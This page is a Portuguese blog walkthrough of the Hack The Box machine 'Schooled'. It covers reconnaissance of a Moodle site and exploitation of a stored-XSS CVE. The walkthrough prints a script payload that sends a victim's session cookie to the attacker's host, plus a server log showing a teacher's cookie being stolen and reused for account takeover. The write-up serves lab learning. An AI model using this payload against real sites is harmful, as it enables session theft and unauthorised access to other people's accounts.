<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.24.0 by Michael Rose
  Copyright 2013-2020 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <!-- start custom head snippets -->
<!-- Begin Jekyll GTM tag v1.0.3 -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-MF4PLJ5');</script>
<!-- End Jekyll GTM tag v1.0.3 -->


<!-- insert favicons. use https://realfavicongenerator.net/ -->
<link rel="shortcut icon" href="/assets/images/favicon.ico" />

<!-- Multilang tags -->

    
<link rel="alternate" hreflang="pt-BR" href="https://davicruz.com/walkthrough/2021/09/htb-schooled">
<link rel="alternate" hreflang="x-default" href="https://davicruz.com/walkthrough/2021/09/htb-schooled">
    

    
<link rel="alternate" hreflang="en-US" href="https://davicruz.com/en-US/walkthrough/2021/09/htb-schooled">
        
<link rel="alternate" hreflang="en" href="https://davicruz.com/en-US/walkthrough/2021/09/htb-schooled">
        
    


<!-- end custom head snippets -->

    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Walktrough: HTB Schooled | Davi Cruz</title>
<meta name="description" content="Olá pessoal!  A máquina desta semana será Schooled, outra máquina Linux classificada como mediana do Hack The Box, criada por TheCyberGeek.">


  <meta name="author" content="Davi Cruz">
  
  <meta property="article:author" content="Davi Cruz">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Davi Cruz">
<meta property="og:title" content="Walktrough: HTB Schooled">
<meta property="og:url" content="https://davicruz.com/walkthrough/2021/09/htb-schooled">


  <meta property="og:description" content="Olá pessoal!  A máquina desta semana será Schooled, outra máquina Linux classificada como mediana do Hack The Box, criada por TheCyberGeek.">



  <meta property="og:image" content="https://i.imgur.com/ksBoJIQ.png">



  <meta name="twitter:site" content="@zerahzurc">
  <meta name="twitter:title" content="Walktrough: HTB Schooled">
  <meta name="twitter:description" content="Olá pessoal!  A máquina desta semana será Schooled, outra máquina Linux classificada como mediana do Hack The Box, criada por TheCyberGeek.">
  <meta name="twitter:url" content="https://davicruz.com/walkthrough/2021/09/htb-schooled">

  
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content="https://i.imgur.com/ksBoJIQ.png">
  

  



  <meta property="article:published_time" content="2021-09-11T00:00:00-03:00">





  

  


<link rel="canonical" href="https://davicruz.com/walkthrough/2021/09/htb-schooled">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": "Davi Cruz",
      "url": "https://davicruz.com/",
      "sameAs": ["https://twitter.com/zerahzurc","https://www.linkedin.com/in/davicruz","https://github.com/davi-cruz"]
    
  }
</script>


  <meta name="google-site-verification" content="hrWV-PqvbpxEy2HdpVYFQNws2Sz_tROleVyF18s2kWA" />


  <meta name="msvalidate.01" content="60B1FA6CDAF15D226AB529AF30386BD8">



  <meta name="yandex-verification" content="08de8d8c0326420f">



<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Davi Cruz Feed">


<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css"></noscript>



  </head>

  <body class="layout--single wide">
    <!-- Begin Jekyll GTM tag v1.0.3 (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MF4PLJ5" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Jekyll GTM tag v1.0.3 (noscript) -->

    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Pular para navegação primária</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Pular para conteúdo</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Pular para rodapé</a></li>
  </ul>
</nav>

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        <!-- CUSTOM: Edit to adjust links to localized page -->
        
        
          <a class="site-logo" href="/"><img src="/assets/images/logo.png" alt="Davi Cruz"></a>
        
        <a class="site-title" href="/">
          Davi Cruz
          
        </a>
        
        <!-- END CUSTOM: Edit to adjust links to localized page -->
        <ul class="visible-links">
          <!-- CUSTOM: Edit to get localized navigation --><li class="masthead__menu-item">
              <a href="/categorias/">Categorias</a>
            </li>
<li class="masthead__menu-item">
              <a href="/tags/">Tags</a>
            </li>
<li class="masthead__menu-item">
              <a href="/sobre/">Sobre</a>
            </li>
<!-- END CUSTOM: Edit to get localized navigation -->
        </ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Chavear busca</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Chavear menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      





<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person" class="h-card">

  
    <div class="author__avatar">
      <a href="https://davicruz.com/">
        <img src="/assets/images/bio-photo.jpg" alt="Davi Cruz" itemprop="image" class="u-photo">
      </a>
    </div>
  

  <div class="author__content">
    <h3 class="author__name p-name" itemprop="name">
      <a class="u-url" rel="me" href="https://davicruz.com/" itemprop="url">Davi Cruz</a>
    </h3>
    
      <div class="author__bio p-note" itemprop="description">
        <p>Just another Cybersecurity professional</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Siga</button>
    <ul class="author__urls social-icons">
      
        <li itemprop="homeLocation" itemscope itemtype="https://schema.org/Place">
          <i class="fas fa-fw fa-map-marker-alt" aria-hidden="true"></i> <span itemprop="name" class="p-locality">São Paulo, BR</span>
        </li>
      

      
        
          
            <li><a href="https://linkedin.com/in/davicruz" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fab fa-linkedin" aria-hidden="true"></i><span class="label">Linkedin</span></a></li>
          
        
          
            <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i><span class="label">Twitter</span></a></li>
          
        
          
            <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer me">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page h-entry" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Walktrough: HTB Schooled">
    <meta itemprop="description" content="Olá pessoal!A máquina desta semana será Schooled, outra máquina Linux classificada como mediana do Hack The Box, criada por TheCyberGeek.">
    <meta itemprop="datePublished" content="2021-09-11T00:00:00-03:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title p-name" itemprop="headline">
            <a href="https://davicruz.com/walkthrough/2021/09/htb-schooled" class="u-url" itemprop="url">Walktrough: HTB Schooled
</a>
          </h1>
          

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-09-11T00:00:00-03:00">September 11, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          12 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/09/htb-schooled">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


        </header>
      

      <section class="page__content e-content" itemprop="text">
        
        <p>Olá pessoal!</p>

<p>A máquina desta semana será <strong>Schooled</strong>, outra máquina Linux classificada como mediana do <a href="https://www.hackthebox.eu/">Hack The Box</a>, criada por <a href="https://app.hackthebox.eu/users/114053">TheCyberGeek</a>.<!--more--></p>

<p class="notice--info"><img class="emoji" title=":information_source:" alt=":information_source:" src="https://github.githubassets.com/images/icons/emoji/unicode/2139.png" height="20" width="20"> <strong>Info</strong>: Write-ups para máquinas do Hack The Box são postados assim que as máquinas são aposentadas.</p>

<p><img src="https://i.imgur.com/qw8zycI.png" alt="HTB Schooled" class="align-center"></p>

<p>Para resolver esta máquina, precisei explorar dois CVEs de uma versão vulnerável do Moodle, que foi a parte mais difícil do processo, uma vez que a PoC das vulnerabilidades não funcionaram corretamente e demorei um pouco para entender exatamente os passos necessários e executá-los manualmente para obter o acesso inicial. Após isso, tudo foi bem tranquilo, onde as credenciais do banco de dados foram obtidas e, na sequencia, abusei de instruções super permissivas de <code class="language-plaintext highlighter-rouge">sudo</code>.</p>

<p>Espero que gostem!</p>

<h2 id="enumeração">Enumeração</h2>

<p>Como de costume, iniciei por executar um scan rápido com o <code class="language-plaintext highlighter-rouge">nmap</code> para listar os serviços atualmente publicados.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-Pn</span> <span class="nt">-oA</span> quick 10.10.10.234
Host discovery disabled <span class="o">(</span><span class="nt">-Pn</span><span class="o">)</span><span class="nb">.</span> All addresses will be marked <span class="s1">'up'</span> and scan <span class="nb">times </span>will be slower.
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-08-01 14:41 <span class="nt">-03</span>
Nmap scan report <span class="k">for </span>10.10.10.234
Host is up <span class="o">(</span>0.077s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9 <span class="o">(</span>FreeBSD 20200214<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc <span class="o">(</span>RSA<span class="o">)</span>
|   256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.46 <span class="o">((</span>FreeBSD<span class="o">)</span> PHP/7.4.15<span class="o">)</span>
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 <span class="o">(</span>FreeBSD<span class="o">)</span> PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
Service Info: OS: FreeBSD<span class="p">;</span> CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>16.06 seconds
</code></pre></div></div>

<p>Em paralelo, iniciei outro scan, para validar todas as portas TCP abertas, onde encontrei também a porta 33060/TCP, resultando no output final dos seguintes serviços:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nmap <span class="nt">-p</span> 80,33060 <span class="nt">-A</span> <span class="nt">-oA</span> Full 10.10.10.234                                                                                     
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-08-01 14:57 <span class="nt">-03</span>
Nmap scan report <span class="k">for </span>schooled.htb <span class="o">(</span>10.10.10.234<span class="o">)</span>
Host is up <span class="o">(</span>0.077s latency<span class="o">)</span><span class="nb">.</span>

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.46 <span class="o">((</span>FreeBSD<span class="o">)</span> PHP/7.4.15<span class="o">)</span>
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 <span class="o">(</span>FreeBSD<span class="o">)</span> PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open  mysqlx?
| fingerprint-strings:
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
|     Invalid message<span class="s2">"
|     HY000
|   LDAPBindReq:
|     *Parse error unserializing protobuf message"</span>
|     HY000
|   oracle-tns:
|     Invalid message-frame.<span class="s2">"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.91%I=7%D=8/1%Time=6106E084%P=x86_64-pc-linux-gnu%r(NU
SF:LL,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(GenericLines,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>
SF:08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(GetRequest,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(HTTPOpt
SF:ions,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(RTSPRequest,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\</span>
SF:x08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(RPCCheck,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(DNSVersi
SF:onBindReqTCP,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(DNSStatusRequestTCP,2B
SF:,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0\x</span>1e<span class="se">\0\0\0\x</span>01<span class="se">\x</span>08<span class="se">\x</span>01<span class="se">\x</span>10<span class="se">\x</span>88<span class="s1">'\x1a\x0fIn
SF:valid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
SF:r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\
SF:x10\x88'</span><span class="se">\x</span>1a<span class="se">\x</span>0fInvalid<span class="se">\x</span>20message<span class="se">\"\x</span>05HY000<span class="s2">")%r(TerminalServerCookie,
SF:9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(TLSSessionReq,2B,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>0
SF:8<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0\x</span>1e<span class="se">\0\0\0\x</span>01<span class="se">\x</span>08<span class="se">\x</span>01<span class="se">\x</span>10<span class="se">\x</span>88<span class="s1">'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9,
SF:"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'</span><span class="se">\x</span>1a<span class="se">\x</span>0fInvalid<span class="se">\x</span>20message<span class="se">\"\x</span>05HY00
SF:0<span class="s2">")%r(FourOhFourRequest,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(LPDString,9
SF:,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(LDAPSearchReq,2B,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08
SF:<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0\x</span>1e<span class="se">\0\0\0\x</span>01<span class="se">\x</span>08<span class="se">\x</span>01<span class="se">\x</span>10<span class="se">\x</span>88<span class="s1">'\x1a\x0fInvalid\x20message\"\x
SF:05HY000")%r(LDAPBindReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x01\x
SF:08\x01\x10\x88'</span><span class="se">\x</span>1a<span class="se">\*</span>Parse<span class="se">\x</span>20error<span class="se">\x</span>20unserializing<span class="se">\x</span>20protobuf<span class="se">\x</span>20mes
SF:sage<span class="se">\"\x</span>05HY000<span class="s2">")%r(SIPOptions,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(LAND
SF:esk-RC,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(TerminalServer,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0</span>
SF:<span class="se">\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(NCP,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(NotesRPC
SF:,2B,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0\x</span>1e<span class="se">\0\0\0\x</span>01<span class="se">\x</span>08<span class="se">\x</span>01<span class="se">\x</span>10<span class="se">\x</span>88<span class="s1">'\x1a\x0
SF:fInvalid\x20message\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,32,"\
SF:x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'</span><span class="se">\x</span>1a<span class="se">\x</span>16Invalid<span class="se">\</span>
SF:x20message-frame<span class="se">\.\"\x</span>05HY000<span class="s2">")%r(ms-sql-s,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1
SF:a<span class="se">\0</span><span class="s2">")%r(afp,2B,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0\x</span>1e<span class="se">\0\0\0\x</span>01<span class="se">\x</span>08<span class="se">\x</span>01<span class="se">\x</span>10<span class="se">\</span>
SF:x88<span class="s1">'\x1a\x0fInvalid\x20message\"\x05HY000");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.96 seconds
</span></code></pre></div></div>

<h3 id="80tcp---serviço-http">80/TCP - Serviço HTTP</h3>

<p>Acessando a página inicial, podemos ver um site institucional de uma escola, que também menciona que todo o seu conteúdo é entregue através da plataforma <strong>Moodle</strong>, que eventualmente teremos acesso e precisaremos buscar por ela eventualmente.</p>

<p><img src="https://i.imgur.com/hy0QFcA.png" alt="HTB Schooled - Institutional Page" class="align-center"></p>

<p>Também, executando o <code class="language-plaintext highlighter-rouge">whatweb</code>, encontrei a conta de e-mail <strong>admissions@schooled.htb</strong> onde o dominicio <code class="language-plaintext highlighter-rouge">schooled.htb</code> deve ser o utilizado pela organização, o qual foi adicionado ao arquivo hosts local.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>whatweb <span class="nt">--color</span><span class="o">=</span>never <span class="nt">-a</span> 3 10.10.10.234
http://10.10.10.234 <span class="o">[</span>200 OK] Apache[2.4.46], Bootstrap[4.1.0], Country[RESERVED][ZZ], Email[#,admissions@schooled.htb], HTML5, HTTPServer[FreeBSD][Apache/2.4.46 <span class="o">(</span>FreeBSD<span class="o">)</span> PHP/7.4.15], IP[10.10.10.234], PHP[7.4.15], Script, Title[Schooled - A new kind of educational institute], X-UA-Compatible[IE<span class="o">=</span>edge]
</code></pre></div></div>

<p>Enquanto deixei o <code class="language-plaintext highlighter-rouge">gobuster dir</code> executando em background para enumerar páginas e eventuais diretórios nessa máquina, uma vez que vi que nada estava sendo retornado, decidi iniciar uma instancia de enumeração de subdomínios, onde os domínios <strong>moodle</strong> e <strong>student</strong> foram encontrados, também adicionados no arquivo hosts local.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>gobuster dns <span class="nt">-d</span> schooled.htb <span class="nt">-w</span> /usr/share/dnsrecon/subdomains-top1mil-5000.txt
<span class="o">===============================================================</span>
Gobuster v3.1.0
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Domain:     schooled.htb
<span class="o">[</span>+] Threads:    10
<span class="o">[</span>+] Timeout:    1s
<span class="o">[</span>+] Wordlist:   /usr/share/dnsrecon/subdomains-top1mil-5000.txt
<span class="o">===============================================================</span>
2021/08/01 17:24:31 Starting gobuster <span class="k">in </span>DNS enumeration mode
<span class="o">===============================================================</span>
Found: moodle.schooled.htb
Found: student.schooled.htb

<span class="o">===============================================================</span>
2021/08/01 17:25:04 Finished
<span class="o">===============================================================</span>
</code></pre></div></div>

<p>O subdomínio <code class="language-plaintext highlighter-rouge">student.schooled.htb</code> estava redirecionando para a página principal, porém o subdomínio <code class="language-plaintext highlighter-rouge">moodle.schooled.htb</code> nos redirecionou para a página abaixo, que consiste em um site Moodle que vimos sendo mencionado anteriormente e através do qual poderemos obter algum tipo de acesso se este possuir alguma vulnerabilidade não corrigida.</p>

<p><img src="https://i.imgur.com/Sx32BwP.png" alt="HTB Schooled - Moodle" class="align-center"></p>

<p>Iniciando a enumeração do site Moodle, utilizei o script <a href="https://github.com/inc0d3/moodlescan">moodlescan</a> que simplifica este processo, onde pude obter a versão em execução da plataforma que é <strong>3.9.0-beta</strong>, segundo output abaixo:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>python3 moodlescan.py <span class="nt">-u</span> http://moodle.schooled.htb/moodle

Version 0.8 - May/2021
.............................................................................................................

By Victor Herrera - supported by www.incode.cl

.............................................................................................................

Getting server information http://moodle.schooled.htb/moodle ...

server          : Apache/2.4.46 <span class="o">(</span>FreeBSD<span class="o">)</span> PHP/7.4.15
x-powered-by    : PHP/7.4.15
x-frame-options : sameorigin
last-modified   : Mon, 02 Aug 2021 11:54:53 GMT

Getting moodle version...

Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta

Searching vulnerabilities...


Vulnerabilities found: 0

Scan completed.
</code></pre></div></div>

<p>Validando esta versão, pude notar que existem diversas vulnerabilidades conhecidas porém todas elas requerem privilégios que ainda não temos. Decidi então seguir tentando criar uma conta na plataforma e ver se consigo obter alguma informação interessante, considerando que nada estava aberto para usuários acessando o portal como visitante.</p>

<p>Enquanto criava a conta, notei que existe um requisito de utilizar um e-mail do subdomínio <strong>student.schooled.htb</strong>, previamente enumerado utilizando o <code class="language-plaintext highlighter-rouge">gobuster</code>.</p>

<p>Mesmo havendo o requisito, nenhum tipo de validação foi necessária e, ao navegar no portal, a única turma que consegui fazer o auto-assinalamento foi a turma de Matemática, que continua o seguinte anúncio:</p>

<blockquote>
  <p>Reminder for joining students
by Manuel Phillips - Wednesday, 23 December 2020, 12:01 AM
Number of replies: 0
This is a self enrollment course. For students who wish to attend my lectures be sure that you have your MoodleNet profile set.</p>

  <p>Students who do not set their MoodleNet profiles will be removed from the course before the course is due to start and I will be checking all students who are enrolled on this course.</p>

  <p>Look forward to seeing you all soon.</p>

  <p>Manuel Phillips</p>
</blockquote>

<p>Isso significa que o professor Manuel Philips verificará todos os perfis MoodleNet dos alunos que se inscreveram na matéria e, caso possamos armazenar um XSS neste atributo, poderemos utilizar deste artifício para roubar a sessão do professor a partir dos atributos do cabeçalho da requisição. Com acesso na plataforma, dependendo dos privilégios do professor, podemos buscar por uma oportunidade de RCE.</p>

<h2 id="acesso-inicial">Acesso inicial</h2>

<p>Buscando por <strong>MoodleNet XSS</strong>, encontrei este <a href="https://moodle.org/mod/forum/discuss.php?d=410839">Security Announcement</a> que menciona o <strong>CVE-2020-25627</strong>, corrigido apenas na versão 3..9.2 e afeta as versões 3.9 e 3.9.1, que coincide com nosso cenário.</p>

<p>Buscando por uma prova de conceito (PoC) para este CVE, encontrei o repositório <a href="https://github.com/HoangKien1020/CVE-2020-25627">HoangKien1020/CVE-2020-25627: Stored XSS via moodlenetprofile parameter in user profile (github.com)</a> que contém as instruções para exploração, que foram implementadas e me permitiram obter o cookie da sessão do professor, conforme evidencia abaixo:</p>

<ul>
  <li>Loguei com a conta recentemente criada e modifiquei o MoodleNet profile para o conteúdo abaixo</li>
</ul>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;script&gt;</span><span class="kd">var</span> <span class="nx">i</span><span class="o">=</span><span class="k">new</span> <span class="nx">Image</span><span class="p">;</span><span class="nx">i</span><span class="p">.</span><span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://10.10.10.10/xss.php?</span><span class="dl">"</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">;</span><span class="nt">&lt;/script&gt;</span>
</code></pre></div></div>

<ul>
  <li>Hospedei o arquivo <code class="language-plaintext highlighter-rouge">xss.php</code> mencionado no repositório em uma pasta e iniciei um PHP Webserver com os comandos abaixo e, cerca de 2 minutos depois, comecei a receber as requisições da conta do professor, nos mostrando os cookies utilizados por ele.</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">sudo </span>php <span class="nt">-S</span> 0.0.0.0:80 <span class="nt">-t</span> <span class="nb">.</span>
<span class="o">[</span>Mon Aug  9 14:44:05 2021] PHP 7.4.21 Development Server <span class="o">(</span>http://0.0.0.0:80<span class="o">)</span> started
<span class="o">[</span>Mon Aug  9 14:45:28 2021] 10.10.10.234:55102 Accepted
<span class="o">[</span>Mon Aug  9 14:45:28 2021] PHP Notice:  Undefined index: METHOD <span class="k">in</span> /opt/dcruz/htb/schooled-10.10.10.234/exploit/www/xss.php on line 28
<span class="o">[</span>Mon Aug  9 14:45:28 2021] PHP Notice:  Undefined index: REMOTE_HOST <span class="k">in</span> /opt/dcruz/htb/schooled-10.10.10.234/exploit/www/xss.php on line 29
<span class="o">[</span>Mon Aug  9 14:45:28 2021] 10.10.10.234:55102 <span class="o">[</span>200]: GET /xss.php?MoodleSession<span class="o">=</span>d8so1t4rs4vmg8btrgfr2ps6fr
<span class="o">[</span>Mon Aug  9 14:45:28 2021] 10.10.10.234:55102 Closing

</code></pre></div></div>

<p>Agora sabendo quais os parametros da sessão do professor, alterei o valor do cookie no meu navegador e, após atualizar a página, pude observar que a conta agora é listada como a do professor Manuel Philips.</p>

<p><img src="https://i.imgur.com/n3plh19.png" alt="HTB Schooled - Moodle as Manuel Philips" class="align-center"></p>

<p>Agora que temos acesso a outra conta, necessitamos validar se as permissões possuidas por este usuário são suficientes para dar continuidade na exploração, vindo a obter um RCE.</p>

